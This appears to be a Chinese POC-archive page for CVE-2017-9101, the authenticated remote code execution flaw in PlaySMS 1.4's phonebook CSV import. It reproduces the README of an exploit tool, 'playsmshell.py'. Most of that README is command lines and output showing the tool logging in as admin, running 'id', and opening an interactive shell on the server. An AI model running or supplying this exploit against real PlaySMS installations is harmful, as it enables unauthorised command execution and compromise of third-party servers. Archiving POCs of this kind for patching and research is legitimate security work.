关联漏洞
标题:PlaySMS 安全漏洞 (CVE-2017-9101)Description:PlaySMS是一套基于Web的短信平台。该平台支持连接短信网关、个人信息系统以及企业的群组通讯工具等。 PlaySMS 1.4版本中的import.php文件(又名电话簿导入功能)存在安全漏洞。远程攻击者可利用该漏洞执行代码。
Description
Exploit for PlaySMS 1.4 authenticated RCE
介绍
# PlaySMS 1.4 authenticated RCE
Simple method of performing remote code execution through the Phonebook CSV upload issue as described on [ExploitDB](https://www.exploit-db.com/exploits/42044/).
Either run a single command:
```
% python3 playsmshell.py --url http://localhost/playsms --password playwithsms -c 'id'
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in!
[*] Grabbing CSRF token for phonebook import
uid=33(www-data) gid=33(www-data) groups=33(www-data)
%
```
Or mimic a shell of sorts:
```
% python3 playsmshell.py --url http://localhost/playsms --password playwithsms -i
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in!
[*] Grabbing CSRF token for phonebook import
[+] Entering interactive shell; type "quit" or ^D to quit
> uname -a
Linux localhost 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018 i686 i686 i686 GNU/Linux
> ls
config-dist.php
config.php
inc
index.php
init.php
lib
plugin
storage
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
>
```
文件快照
[4.0K] /data/pocs/ff14de27a75cecfe2b511004b4c73486ed0aa8f5
├── [1.1K] LICENSE
├── [4.4K] playsmshell.py
└── [1.0K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。